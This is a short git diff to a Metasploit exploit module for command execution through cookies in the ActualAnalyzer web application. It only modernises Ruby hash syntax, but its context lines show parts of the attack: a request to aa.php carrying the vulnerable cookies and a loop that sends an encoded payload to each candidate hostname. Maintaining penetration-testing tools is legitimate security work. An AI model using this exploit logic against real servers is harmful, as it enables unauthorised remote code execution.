diff --git a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb index dcc5087747..378d2f605c 100644 --- a/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb +++ b/modules/exploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote nil end - def execute_command(cmd, opts = { :analytics_host => vhost }) + def execute_command(cmd, opts = { analytics_host: vhost }) vuln_cookies = %w(anw anm) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'aa.php'), @@ -249,7 +249,7 @@ class Metasploit3 < Msf::Exploit::Remote analytics_hosts.uniq.each do |host| next if host.nil? vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...") - break if execute_command(payload.encoded, { :analytics_host => host }) + break if execute_command(payload.encoded, analytics_host: host) end end end